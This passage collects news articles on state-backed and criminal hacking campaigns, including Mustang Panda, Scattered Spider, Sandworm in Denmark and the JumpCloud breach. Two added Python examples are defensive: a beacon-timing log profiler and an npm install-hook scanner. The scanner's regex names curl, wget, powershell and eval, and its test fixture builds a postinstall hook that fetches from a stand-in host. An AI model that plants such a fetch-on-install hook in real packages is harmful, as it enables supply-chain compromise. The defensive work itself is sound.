The use of SmadavProtect is a known tactic adopted by Mustang Panda in recent months, having deployed malware expressly designed to bypass the security solution.
"Stately Taurus continues to demonstrate its ability to conduct persistent cyberespionage operations as one of the most active Chinese APTs," the researchers said.
"These operations target a variety of entities globally that align with geopolitical topics of interest to the Chinese government."
The disclosure comes as a South Korean APT actor named Higaisa has been uncovered targeting Chinese users through phishing websites mimicking well-known software applications such as OpenVPN.
"Once executed, the installer drops and runs Rust-based malware on the system, subsequently triggering a shellcode," Cyble said late last month. "The shellcode performs anti-debugging and decryption operations. Afterward, it establishes encrypted command-and-control (C&C) communication with a remote Threat Actor (TA)."
Indian Hack-for-Hire Group Targeted U.S., China, and More for Over 10 Years
20.11.23 BigBrothers The Hacker News
An Indian hack-for-hire group targeted the U.S., China, Myanmar, Pakistan, Kuwait, and other countries as part of a wide-ranging espionage, surveillance, and disruptive operation for over a decade.
The Appin Software Security (aka Appin Security Group), according to an in-depth analysis from SentinelOne, began as an educational startup offering offensive security training programs, while carrying out covert hacking operations since at least 2009.
In May 2013, ESET disclosed a set of cyber attacks targeting Pakistan with information-stealing malware. While the activity was attributed to a cluster tracked as Hangover (aka Patchwork or Zinc Emerson), evidence shows that the infrastructure is owned and controlled by Appin.
"The group has conducted hacking operations against high value individuals, governmental organizations, and other businesses involved in specific legal disputes," SentinelOne security researcher Tom Hegel said in a comprehensive analysis published last week.
"Appin's hacking operations and overall organization appear at many times informal, clumsy, and technically crude; however, their operations proved highly successful for their customers, impacting world affairs with significant success."
The findings are based on non-public data obtained by Reuters, which called out Appin for orchestrating data theft attacks on an industrial scale against political leaders, international executives, sports figures, and others. The company, in response, has dismissed its connection with the hack-for-hire business.
One of the core services offered by Appin was a tool called "MyCommando" (aka GoldenEye or Commando) that allowed its customers to log in to view and download campaign-specific data and status updates, communicate securely, and choose from various task options that range from open-source research to social engineering to a trojan campaign.
The targeting of China and Pakistan is confirmation that an Indian-origin mercenary group has been roped in to conduct state-sponsored attacks. Appin has also been identified as behind the macOS spyware known as KitM in 2013.
What's more, SentinelOne said it also identified instances of domestic targeting with the goal of stealing login credentials of email accounts belonging to Sikhs in India and the U.S.
"In an unrelated campaign, the group also used the domain speedaccelator[.]com for an FTP server, hosting malware used in their malicious phishing emails, one of which was used on an Indian individual later targeted by the ModifiedElephant APT," Hegel noted. It's worth noting that Patchwork's links to ModifiedElephant were previously identified by Secureworks.
Besides leveraging a large infrastructure sourced from a third-party for data exfiltration, command-and-control (C2), phishing, and setting up decoy sites, the shadowy private-sector offensive actor (PSOA) is said to have relied on private spyware and exploit services provided by private vendors like Vervata, Vupen, and Core Security.
In another noteworthy tactic, Appin is said to have leveraged a California-based freelancing platform referred to as Elance (now called Upwork) to purchase malware from external software developers, while also using its in-house employees to develop a custom collection of hacking tools.
"The research findings underscore the group's remarkable tenacity and a proven track record of successfully executing attacks on behalf of a diverse clientele," Hegel said.
The development comes as Aviram Azari, an Israeli private investigator, was sentenced in the U.S. to nearly seven years in federal prison on charges of computer intrusion, wire fraud, and aggravated identity theft in connection with a global hack-for-hire scheme between November 2014 and September 2019. Azari was arrested in September 2019.
"Azari owned and operated an Israeli intelligence firm," the Department of Justice (DoJ) said last week. "Clients hired Azari to manage 'Projects' that were described as intelligence gathering efforts but were, in fact, hacking campaigns specifically targeting certain groups of victims."
Aviram has also been accused of using mercenary hackers in India, a company called BellTroX Infotech (aka Amanda or Dark Basin), to help clients gain an advantage in court battles via spear-phishing attacks and ultimately gain access to victims' accounts and steal information.
BellTrox was founded by Sumit Gupta in May 2013. Reuters disclosed in June 2022 that prior to launching the company, Gupta had worked for Appin.
U.S. Cybersecurity Agencies Warn of Scattered Spider's Gen Z Cybercrime Ecosystem
17.11.23 BigBrothers The Hacker News
U.S. cybersecurity and intelligence agencies have released a joint advisory about a cybercriminal group known as Scattered Spider that's known to employ sophisticated phishing tactics to infiltrate targets.
"Scattered Spider threat actors typically engage in data theft for extortion using multiple social engineering techniques and have recently leveraged BlackCat/ALPHV ransomware alongside their usual TTPs," the agencies said.
The threat actor, also tracked under the monikers Muddled Libra, Octo Tempest, 0ktapus, Scatter Swine, Star Fraud, and UNC3944, was the subject of an extensive profile from Microsoft last month, with the tech giant calling it "one of the most dangerous financial criminal groups."
Considered experts in social engineering, Scattered Spider is known to rely on phishing, prompt bombing, and SIM swapping attacks to obtain credentials, install remote access tools, and bypass multi-factor authentication (MFA).
Scattered Spider, like LAPSUS$, is said to be part of a larger Gen Z cybercrime ecosystem that refers to itself as the Com (alternately spelled Comm), which has resorted to violent activity and swatting attacks.
A report from Reuters earlier this week disclosed that the U.S. Federal Bureau of Investigation (FBI) is aware of the identities of at least a dozen members of the cybercrime gang.
One of the notable tricks in its arsenal is the impersonation of IT and help desk staff, using phone calls or SMS messages to target employees and gain elevated access to their networks.
Successful initial access is followed by the deployment of legitimate remote access tunneling tools such as Fleetdeck.io, Ngrok, and Pulseway, as well as remote access trojans and stealers like AveMaria (aka Warzone RAT), Raccoon Stealer, and Vidar Stealer.
Furthermore, the English-speaking extortion crew leverages living-off-the-land (LotL) techniques to skirt detection and navigate compromised networks with an ultimate aim to steal sensitive information in exchange for a payment.
"The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses," the agencies noted.
As of mid-2023, Scattered Spider has also acted as an affiliate for the BlackCat ransomware gang, monetizing its access to victims for extortion-enabled ransomware and data theft.
The U.S. government is urging companies to implement phishing-resistant MFA, enforce a recovery plan, maintain offline backups, and adopt application controls to prevent the execution of unauthorized software on endpoints.
Russian Hackers Linked to 'Largest Ever Cyber Attack' on Danish Critical Infrastructure
16.11.23 BigBrothers The Hacker News
Russian threat actors have been possibly linked to what's been described as the "largest cyber attack against Danish critical infrastructure," in which 22 companies associated with the operation of the country's energy sector were targeted in May 2023.
"22 simultaneous, successful cyberattacks against Danish critical infrastructure are not commonplace," Denmark's SektorCERT said [PDF]. "The attackers knew in advance who they were going to target and got it right every time. Not once did a shot miss the target."
The agency said it found evidence connecting one or more attacks to Russia's GRU military intelligence agency, which is also tracked under the name Sandworm and has a track record of orchestrating disruptive cyber assaults on industrial control systems. This assessment is based on artifacts communicating with IP addresses that have been traced to the hacking crew.
The unprecedented and coordinated cyber attacks took place on May 11 by exploiting CVE-2023-28771 (CVSS score: 9.8), a critical command injection flaw impacting Zyxel firewalls that was disclosed in late April 2023.
On the 11 companies that were successfully infiltrated, the threat actors executed malicious code to conduct reconnaissance of the firewall configurations and determine the next course of action.
"This kind of coordination requires planning and resources," SektorCERT said in a detailed timeline of events. "The advantage of attacking simultaneously is that the information about one attack cannot spread to the other targets before it is too late."
"This puts the power of information sharing out of play because no one can be warned in advance about the ongoing attack since everyone is attacked at the same time. It is unusual – and extremely effective."
A second wave of attacks targeting more organizations was subsequently recorded from May 22 to 25 by an attack group with previously unseen cyber weapons, raising the possibility that two different threat actors were involved in the campaign.
That said, it's currently unclear if the groups collaborated with each other, worked for the same employer, or were acting independently.
These attacks are suspected to have weaponized two more critical bugs in Zyxel gear (CVE-2023-33009 and CVE-2023-33010, CVSS scores: 9.8) as zero-days to co-opt the firewalls into Mirai and MooBot botnets, given that patches for them were released by the company on May 24, 2023.
The compromised devices, in some cases, were used to conduct distributed denial-of-service (DDoS) attacks against unnamed companies in the U.S. and Hong Kong.
"After the exploit code for some of the vulnerabilities became publicly known around 30/5, attack attempts against the Danish critical infrastructure exploded – especially from IP addresses in Poland and Ukraine," SektorCERT explained.
The onslaught of attacks prompted the affected entities to disconnect from the internet and go into island mode, the agency further added.
But it's not only nation-state actors. The energy sector is also increasingly becoming a focus for ransomware groups, with initial access brokers (IABs) actively promoting unauthorized access to nuclear energy firms, according to a report from Resecurity earlier this week.
The development comes as Censys discovered six hosts belonging to NTC Vulkan, a Moscow-based IT contractor that's alleged to have supplied offensive cyber tools to Russian intelligence agencies, including Sandworm.
Furthermore, the research uncovered a connection to a group called Raccoon Security via an NTC Vulkan certificate.
"Racoon Security is a brand of NTC Vulkan and that it is possible that Raccoon Security's activities include either previous or current participation in the previously-mentioned leaked initiatives contracted by the GRU," Matt Lembright, director of Federal Applications at Censys, said.
U.S. Takes Down IPStorm Botnet, Russian-Moldovan Mastermind Pleads Guilty
16.11.23 BigBrothers The Hacker News
The U.S. government on Tuesday announced the takedown of the IPStorm botnet proxy network and its infrastructure, as the Russian and Moldovan national behind the operation pleaded guilty.
"The botnet infrastructure had infected Windows systems then further expanded to infect Linux, Mac, and Android devices, victimizing computers and other electronic devices around the world, including in Asia, Europe, North America and South America," the Department of Justice (DoJ) said in a press statement.
Sergei Makinin, who developed and deployed the malicious software to infiltrate thousands of internet-connected devices from June 2019 through December 2022, faces a maximum of 30 years in prison.
The Golang-based botnet malware, prior to its dismantling, turned the infected devices into proxies as part of a for-profit scheme, which was then offered to other customers via proxx[.]io and proxx[.]net.
"IPStorm is a botnet that abuses a legitimate peer-to-peer (p2p) network called InterPlanetary File System (IPFS) as a means to obscure malicious traffic," cybersecurity firm Intezer noted in October 2020.
The botnet was first documented by Anomali in May 2019, and, over the years, broadened its focus to target other operating systems such as Linux, macOS, and Android.
Threat actors who wish to hide their malicious activities could purchase illegitimate access to more than 23,000 bots for "hundreds of dollars a month" to route their traffic. Makinin is estimated to have netted at least $550,000 from the scheme.
Pursuant to the plea agreement, Makinin is expected to forfeit cryptocurrency wallets linked to the offense.
"The InterPlanetary Storm botnet was complex and used to power various cybercriminal activities by renting it as a proxy as a service system over infected IoT devices," Alexandru Catalin Cosoi, senior director of investigation and forensics unit at Bitdefender, said in a statement shared with The Hacker News.
"Our initial research back in 2020 uncovered valuable clues to the culprit behind its operation, and we are extremely pleased it helped lead to arrests. This investigation is another primary example of law enforcement and the private cybersecurity sector working together to shut down illegal online activities and bring those responsible to justice."
Chinese Hackers Launch Covert Espionage Attacks on 24 Cambodian Organizations
13.11.23 BigBrothers The Hacker News
Cybersecurity researchers have discovered what they say is malicious cyber activity orchestrated by two prominent Chinese nation-state hacking groups targeting 24 Cambodian government organizations.
"This activity is believed to be part of a long-term espionage campaign," Palo Alto Networks Unit 42 researchers said in a report last week.
"The observed activity aligns with geopolitical goals of the Chinese government as it seeks to leverage their strong relations with Cambodia to project their power and expand their naval operations in the region."
Targeted organizations include defense, election oversight, human rights, national treasury and finance, commerce, politics, natural resources, and telecommunications.
The assessment stems from the persistent nature of inbound network connections originating from these entities to a China-linked adversarial infrastructure that masquerades as cloud backup and storage services over a "period of several months."
Some of the command-and-control (C2) domain names are listed below -
api.infinitycloud[.]info
connect.infinitycloud[.]info
connect.infinitybackup[.]net
file.wonderbackup[.]com
login.wonderbackup[.]com
update.wonderbackup[.]com
The tactic is likely an attempt on the part of the attackers to fly under the radar and blend in with legitimate network traffic.
What's more, the links to China are based on the fact that the threat actor's activity has been observed primarily during regular business hours in China, with a drop recorded in late September and early October 2023, coinciding with the Golden Week national holidays, before resuming to regular levels on October 9.
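The two signals Unit 42 relies on above, connections that persist over months and activity concentrated in the adversary's working hours with a holiday-shaped gap, can be checked against a defender's own proxy or firewall logs. The following is an added example, not code from the Unit 42 report or from Palo Alto Networks: it profiles each destination domain by active days, longest gap, and the share of connections falling in business hours of a candidate time zone (UTC+8 here, China Standard Time). The log line format, the sample log lines, and the flagging thresholds are all constructed assumptions for this illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumed log format (constructed, not from the report):
#   "<ISO-8601 UTC timestamp> <source host> <destination domain>"


def make_sample_logs():
    """Build constructed sample logs: one domain beaconing three times a day inside
    UTC+8 business hours with a gap over Golden Week, one domain with traffic at all hours."""
    lines = []
    start = datetime(2023, 7, 1, tzinfo=timezone.utc)
    golden_week = (datetime(2023, 9, 29, tzinfo=timezone.utc),
                   datetime(2023, 10, 6, tzinfo=timezone.utc))
    for day in range(100):
        d = start + timedelta(days=day)
        if not (golden_week[0] <= d <= golden_week[1]):
            # 02:00, 05:00, 08:00 UTC are 10:00, 13:00, 16:00 in UTC+8
            for hour in (2, 5, 8):
                lines.append(f"{d.replace(hour=hour).isoformat()} host-a connect.infinitybackup[.]net")
        # Benign-looking destination: one connection per day, hour cycling through 0..23
        lines.append(f"{d.replace(hour=day % 24).isoformat()} host-a cdn.example.com")
    return lines


def parse_line(line):
    """Split one log line into (aware datetime, source host, destination domain)."""
    ts, src, dst = line.split()
    return datetime.fromisoformat(ts), src, dst


def profile_destinations(lines, utc_offset_hours, business_hours=(9, 18)):
    """Per destination: connection count, distinct active days, calendar span,
    longest inactivity gap, and share of connections inside local business hours."""
    local_tz = timezone(timedelta(hours=utc_offset_hours))
    by_dst = defaultdict(list)
    for line in lines:
        ts, _src, dst = parse_line(line)
        by_dst[dst].append(ts.astimezone(local_tz))

    profiles = {}
    for dst, stamps in by_dst.items():
        stamps.sort()
        days = sorted({t.date() for t in stamps})
        longest_gap = max(((b - a).days for a, b in zip(days, days[1:])), default=0)
        in_hours = sum(1 for t in stamps if business_hours[0] <= t.hour < business_hours[1])
        profiles[dst] = {
            "connections": len(stamps),
            "active_days": len(days),
            "span_days": (days[-1] - days[0]).days + 1,
            "longest_gap_days": longest_gap,
            "business_hour_share": round(in_hours / len(stamps), 2),
        }
    return profiles


def flag_persistent_business_hour_beacons(profiles, min_span_days=60, min_share=0.9):
    """Assumed thresholds: contact spanning at least two months, with 90%+ of
    connections inside the candidate time zone's working day."""
    return sorted(dst for dst, p in profiles.items()
                  if p["span_days"] >= min_span_days and p["business_hour_share"] >= min_share)


if __name__ == "__main__":
    profiles = profile_destinations(make_sample_logs(), utc_offset_hours=8)
    for dst, p in profiles.items():
        print(dst, p)
    print("flagged:", flag_persistent_business_hour_beacons(profiles))
```

A flag from this profile is a lead, not an attribution: legitimate SaaS traffic from a regional office also clusters in that office's working hours, so the result is best read alongside domain registration age, certificate details, and whether the destination matches a sanctioned backup provider.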
China-nexus hacking groups such as Emissary Panda, Gelsemium, Granite Typhoon, Mustang Panda, RedHotel, ToddyCat, and UNC4191 have launched an array of espionage campaigns targeting public and private sectors across Asia in recent months.
Last month, Elastic Security Labs detailed an intrusion set codenamed REF5961 that was found leveraging custom backdoors such as EAGERBEE, RUDEBIRD, DOWNTOWN, and BLOODALCHEMY in its attacks directed against the Association of Southeast Asian Nations (ASEAN) countries.
The malware families "were discovered to be co-residents with a previously reported intrusion set, REF2924," the latter of which is assessed to be a China-aligned group owing to its use of ShadowPad and tactical overlaps with Winnti and ChamelGang.
The disclosures also follow a report from Recorded Future highlighting the shift in Chinese cyber espionage activity, describing it as more mature and coordinated, and with a strong focus on exploiting known and zero-day flaws in public-facing email servers, security, and network appliances.
Since the beginning of 2021, Chinese state-sponsored groups have been attributed to the exploitation of 23 zero-day vulnerabilities, including those identified in Microsoft Exchange Server, Solarwinds Serv-U, Sophos Firewall, Fortinet FortiOS, Barracuda Email Security Gateway, and Atlassian Confluence Data Center and Server.
The state-sponsored cyber operations have evolved "from broad intellectual property theft to a more targeted approach supporting specific strategic, economic, and geopolitical goals, such as those related to the Belt and Road Initiative and critical technologies," the company said.
STARK#MULE Targets Koreans with U.S. Military-themed Document Lures
28.7.23 BigBrothers The Hacker News
An ongoing cyber attack campaign has set its sights on Korean-speaking individuals by employing U.S. Military-themed document lures to trick them into running malware on compromised systems.
Cybersecurity firm Securonix is tracking the activity under the name STARK#MULE.
"Based on the source and likely targets, these types of attacks are on par with past attacks stemming from typical North Korean groups such as APT37 as South Korea has historically been a primary target of the group, especially its government officials," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
APT37, also known by the names Nickel Foxcroft, Reaper, Ricochet Chollima, and ScarCruft, is a North Korean nation-state actor that's known to exclusively focus on targets in its southern counterpart, specifically those involved in reporting on North Korea and supporting defectors.
Attack chains mounted by the group have historically relied on social engineering to phish victims and deliver payloads such as RokRat onto target networks. That said, the adversarial collective has expanded its offensive arsenal with a variety of malware families in recent months, including a Go-based backdoor called AblyGo.
A notable trait of the new campaign is the use of compromised Korean e-commerce websites for staging payloads and command-and-control (C2) in an attempt to fly under the radar of security solutions installed on the systems.
The phishing emails that act as the progenitor make use of U.S. Army recruitment messages to convince recipients into opening a ZIP archive file, which contains a shortcut file that appears under the guise of a PDF document.
The shortcut file, when launched, displays a decoy PDF, but also surreptitiously activates the execution of a rogue "Thumbs.db" file present in the archive file.
"This file performs several functions which include downloading further stagers and leveraging schtasks.exe to establish persistence," the researchers explained.
Two of the next-stage modules – "lsasetup.tmp" and "winrar.exe" – are retrieved from a compromised e-commerce website named "www.jkmusic.co[.]kr," the latter of which is used to extract and run the contents of "lsasetup.tmp," an obfuscated binary that reached out to a second e-commerce site named "www.notebooksell[.]kr."
"Once the connection was established, the attackers were able to acquire system details such as system MAC, Windows version, [and] IP address," the researchers said. "Both websites are registered in Korea [and] only utilize the HTTP protocol."
The disclosure comes as APT37 has also been observed making use of CHM files in phishing emails impersonating security emails from financial institutes and insurance companies to deploy information-stealing malware and other binaries, according to the AhnLab Security Emergency Response Center (ASEC).
"In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments," ASEC said.
APT37 is one of the many North Korean state-sponsored groups that have drawn attention for executing attacks that are designed to perpetrate financial theft – including the recent attacks on Alphapo and CoinsPaid – and gather intelligence in pursuit of the regime's political and national security objectives.
This also comprises the notorious Lazarus Group and its sub-clusters Andariel and BlueNoroff, with the actors leveraging a new backdoor dubbed ScoutEngine and a completely rewritten version of a malware framework called MATA (MATAv5) in intrusions aimed at defense contractors in Eastern Europe in September 2022.
"This sophisticated malware, completely rewritten from scratch, exhibits an advanced and complex architecture that makes use of loadable and embedded modules and plugins," Kaspersky said in its APT trends report for Q2 2023.
"The malware leverages Inter-Process Communication (IPC) channels internally and employs a diverse range of commands, enabling it to establish proxy chains across various protocols, including within the victim's environment."
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder
25.7.23 BigBrothers The Hacker News
North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address.
Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already being monitored as Jade Sleet and TraderTraitor, a group with a history of striking blockchain and cryptocurrency sectors.
UNC4899 also overlaps with APT43, another hacking crew associated with the Democratic People's Republic of Korea (DPRK) that was unmasked earlier this March as conducting a series of campaigns to gather intelligence and siphon cryptocurrency from targeted companies.
The adversarial collective's modus operandi is characterized by the use of Operational Relay Boxes (ORBs) using L2TP IPsec tunnels along with commercial VPN providers to disguise the attacker's true point of origin, with commercial VPN services acting as the final hop.
"There have been many occasions in which DPRK threat actors did not employ this last hop, or mistakenly did not utilize this while conducting actions on operations on the victim's network," the company said in an analysis published Monday, adding it observed "UNC4899 connecting directly to an attacker-controlled ORB from their 175.45.178[.]0/24 subnet."
The intrusion directed against JumpCloud took place on June 22, 2023, as part of a sophisticated spear-phishing campaign that leveraged the unauthorized access to breach fewer than five customers and less than 10 systems in what's called a software supply chain attack.
Mandiant's findings are based on an incident response initiated in the aftermath of a cyber attack against one of JumpCloud's impacted customers, an unnamed software solutions entity, the starting point being a malicious Ruby script ("init.rb") executed via the JumpCloud agent on June 27, 2023.
A notable aspect of the incident is its targeting of four Apple systems running macOS Ventura versions 13.3 or 13.4.1, underscoring North Korean actors' continued investment in honing malware specially tailored for the platform in recent months.
"Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework," the company explained. "In at least one instance, the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent."
The script, for its part, is engineered to download and execute a second-stage payload named FULLHOUSE.DOORED, using it as a conduit to deploy additional malware such as STRATOFEAR and TIEDYE, after which the prior payloads were removed from the system in an attempt to cover up the tracks -
FULLHOUSE.DOORED - A C/C++-based first-stage backdoor that communicates using HTTP and comes with support for shell command execution, file transfer, file management, and process injection
STRATOFEAR - A second-stage modular implant that's chiefly designed to gather system information as well as retrieve and execute more modules from a remote server or loaded from disk
TIEDYE - A second-stage Mach-O executable that can communicate with a remote server to run additional payloads, harvest basic system information, and execute shell commands
TIEDYE is also said to exhibit similarities to RABBITHUNT, a backdoor written in C++ that communicates via a custom binary protocol over TCP and which is capable of reverse shell, file transfer, process creation, and process termination.
"The campaign targeting JumpCloud, and the previously reported DPRK supply chain compromise from earlier this year which affected the Trading Technologies X_TRADER application and 3CX Desktop App software, exemplifies the cascading effects of these operations to gain access to service providers in order to compromise downstream victims," Mandiant said.
"Both operations have suspected ties to financially motivated DPRK actors, suggesting that DPRK operators are implementing supply chain TTPs to target select entities as part of increased efforts to target cryptocurrency and fintech-related assets."
The development comes days after GitHub warned of a social engineering attack mounted by the TraderTraitor actor to trick employees working at blockchain, cryptocurrency, online gambling, and cybersecurity companies into executing code hosted in a GitHub repository that relied on malicious packages hosted on npm.
The infection chain has been found to leverage the malicious npm dependencies to download an unknown second-stage payload from an actor-controlled domain. The packages have since been taken down and the accounts suspended.
"The identified packages, published in pairs, required installation in a specific sequence, subsequently retrieving a token that facilitated the download of a final malicious payload from a remote server," Phylum said in a new analysis detailing the discovery of new npm modules used in the same campaign.
"The vast attack surface presented by these ecosystems is hard to ignore. It's virtually impossible for a developer in today's world not to rely on any open-source packages. This reality is typically exploited by threat actors aiming to maximize their blast radius for widespread distribution of malware, such as stealers or ransomware."
Pyongyang has long used cryptocurrency heists to fuel its sanctioned nuclear weapons program, while simultaneously orchestrating cyber espionage attacks to collect strategic intelligence in support of the regime's political and national security priorities.
"North Korea's intelligence apparatus possesses the flexibility and resilience to create cyber units based on the needs of the country," Mandiant noted last year. "Additionally overlaps in infrastructure, malware, and tactics, techniques and procedures indicate there are shared resources amongst their cyber operations."
The Lazarus Group remains a prolific state-sponsored threat actor in this regard, consistently mounting attacks that are designed to deliver everything from remote access trojans to ransomware to purpose-built backdoors and also demonstrating a readiness to shift tactics and techniques to hinder analysis and make their tracking much harder.
This is exemplified by its ability to not only compromise vulnerable Microsoft Internet Information Services (IIS) web servers, but also use them as malware distribution centers in watering hole attacks aimed at South Korea, according to the AhnLab Security Emergency Response Center (ASEC).
"The threat actor is continuously using vulnerability attacks for initial access to unpatched systems," ASEC said. "It is one of the most dangerous threat groups highly active worldwide."
A second RGB-backed group that's equally focused on amassing information on geopolitical events and negotiations affecting the DPRK's interests is Kimsuky, which has been detected using Chrome Remote Desktop to remotely commandeer hosts already compromised through backdoors such as AppleSeed.
"The Kimsuky APT group is continuously launching spear-phishing attacks against Korean users," ASEC pointed out this month. "They usually employ methods of malware distribution through disguised document files attached to emails, and users who open these files may lose control over their current system."
North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack
21.7.23 BigBrothers The Hacker News
An analysis of the indicators of compromise (IoCs) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX.
The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting that JumpCloud, last week, attributed the attack to an unnamed "sophisticated nation-state sponsored threat actor."
"The North Korean threat actors demonstrate a high level of creativity and strategic awareness in their targeting strategies," SentinelOne security researcher Tom Hegel told The Hacker News. "The research findings reveal a successful and multifaceted approach employed by these actors to infiltrate developer environments."
"They actively seek access to tools and networks that can serve as gateways to more extensive opportunities. Their tendency to execute multiple levels of supply chain intrusions before engaging in financially motivated theft is noteworthy."
In a related development, CrowdStrike, which is working with JumpCloud to probe the incident, pinned the attack to a North Korean actor known as Labyrinth Chollima, a sub-cluster within the infamous Lazarus Group, according to Reuters.
The infiltration was used as a "springboard" to target cryptocurrency companies, the news agency said, indicating an attempt on part of the adversary to generate illegal revenues for the sanctions-hit nation.
The revelations also coincide with a low-volume social engineering campaign identified by GitHub that targets the personal accounts of employees of technology firms, using a mix of repository invitations and malicious npm package dependencies. The targeted accounts are associated with blockchain, cryptocurrency, online gambling, or cybersecurity sectors.
The Microsoft subsidiary connected the campaign to a North Korean hacking group it tracks under the name Jade Sleet (aka TraderTraitor).
"Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms," GitHub's Alexis Wales said in a report published on July 18, 2023.
The attack chains involve setting up bogus personas on GitHub and other social media services such as LinkedIn, Slack, and Telegram, although in some cases the threat actor is believed to have taken control of legitimate accounts.
Under the assumed persona, Jade Sleet initiates contact with the targets and invites them to collaborate on a GitHub repository, convincing the victims into cloning and running the contents, which feature decoy software with malicious npm dependencies that act as first-stage malware to download and execute second-stage payloads on the infected machine.
The malicious npm packages, per GitHub, are part of a campaign that first came to light last month, when Phylum detailed a supply chain threat involving a unique execution chain that uses a pair of fraudulent modules to fetch an unknown piece of malware from a remote server.
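The Phylum analysis earlier on this page (packages published in pairs, installed in sequence, fetching a token and then a final payload) and the GitHub report above both come down to a dependency that runs code at install time. Neither report, as summarised here, says which mechanism the packages used, so the following added example, which is not code from GitHub, Phylum or the campaign, assumes npm lifecycle hooks (preinstall, install, postinstall, prepare), the usual way a package executes during `npm install`. The node_modules tree it inspects, and the package names in it, are constructed.

```python
"""Audit an installed node_modules tree for install-time lifecycle scripts
that reach out to the network or run decoded content.

Added example, not code from GitHub, Phylum or the campaign described above.
Assumption: the malicious dependencies executed through npm lifecycle hooks;
the page does not state the mechanism. The sample tree is constructed and
the package names are invented.
"""
import json
import os
import re
import tempfile

# Hooks npm runs automatically while installing a package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude indicators of network access or execution of decoded content. Tune to taste.
SUSPICIOUS = re.compile(
    r"(https?://|\bcurl\b|\bwget\b|\bnode\s+-e\b|require\(['\"]https?['\"]\)|"
    r"\bfetch\(|\bpowershell\b|base64|\beval\()",
    re.IGNORECASE,
)


def scan_node_modules(root):
    """Return (package name, hook, script) for every lifecycle script matching SUSPICIOUS."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: worth a manual look, not a hit
        scripts = manifest.get("scripts")
        if not isinstance(scripts, dict):
            continue
        name = manifest.get("name") or os.path.relpath(dirpath, root)
        for hook in LIFECYCLE_HOOKS:
            script = scripts.get(hook)
            if isinstance(script, str) and SUSPICIOUS.search(script):
                findings.append((name, hook, script))
    return sorted(findings)


def build_sample_tree():
    """Create a throwaway node_modules with one benign package and one dropper-like package."""
    root = tempfile.mkdtemp(prefix="node_modules_")
    manifests = {
        "pad-helper": {  # invented name, benign: only a build script
            "name": "pad-helper",
            "version": "1.0.0",
            "scripts": {"build": "tsc -p ."},
        },
        "stage-one": {  # invented name, mimics a first-stage dependency
            "name": "stage-one",
            "version": "9.9.9",
            "scripts": {
                "postinstall": "node -e \"require('https').get('https://example.invalid/token')\""
            },
        },
    }
    for folder, manifest in manifests.items():
        os.makedirs(os.path.join(root, folder))
        with open(os.path.join(root, folder, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for name, hook, script in scan_node_modules(build_sample_tree()):
        print(f"{name}: {hook} -> {script}")
```

Run it against a project's node_modules after `npm ci --ignore-scripts`, so the audit happens before any hook has had a chance to execute; a dependency whose install hook fetches a URL and evaluates the response is exactly the first stage described above, whatever its name.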
SentinelOne, in its latest analysis, said 144.217.92[.]197, an IP address linked to the JumpCloud attack, resolves to npmaudit[.]com, one of the eight domains listed by GitHub as used to fetch the second-stage malware. A second IP address 23.29.115[.]171 maps to npm-pool[.]org.
"It is evident that North Korean threat actors are continuously adapting and exploring novel methods to infiltrate targeted networks," Hegel said. "The JumpCloud intrusion serves as a clear illustration of their inclination towards supply chain targeting, which yields a multitude of potential subsequent intrusions."
"The DPRK demonstrates a profound understanding of the benefits derived from meticulously selecting high-value targets as a pivot point to conduct supply chain attacks into fruitful networks," Hegel added.
CERT-UA Uncovers Gamaredon's Rapid Data Exfiltration Tactics Following Initial Compromise
17.7.23 BigBrothers The Hacker News
The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise.
"As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in an analysis of the group published last week.
Gamaredon, also called Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010, is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014. The group is estimated to have infected thousands of government computers.
It is also one of the many Russian hacking crews that have maintained an active presence since the start of the Russo-Ukrainian war in February 2022, leveraging phishing campaigns to deliver PowerShell backdoors such as GammaSteel to conduct reconnaissance and execute additional commands.
The messages typically come bearing an archive containing an HTM or HTA file that, when opened, activates the attack sequence.
According to CERT-UA, GammaSteel is used to exfiltrate files matching a specific set of extensions – .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, and .mdb – within a time period of 30 to 50 minutes.
The group has also been observed consistently evolving its tactics, making use of USB infection techniques for propagation. A host operating in a compromised state for a week could have anywhere between 80 to 120 malicious files, the agency noted.
Also significant is the threat actor's use of AnyDesk software for interactive remote access, PowerShell scripts for session hijacking to bypass two-factor authentication (2FA), and Telegram and Telegraph for fetching the command-and-control (C2) server information.
"Attackers take separate measures to ensure fault tolerance of their network infrastructure and avoid detection at the network level," CERT-UA said. "During the day, the IP addresses of intermediate control nodes can change from 3 to 6 or more times, which, among other things, indicates the appropriate automation of the process."
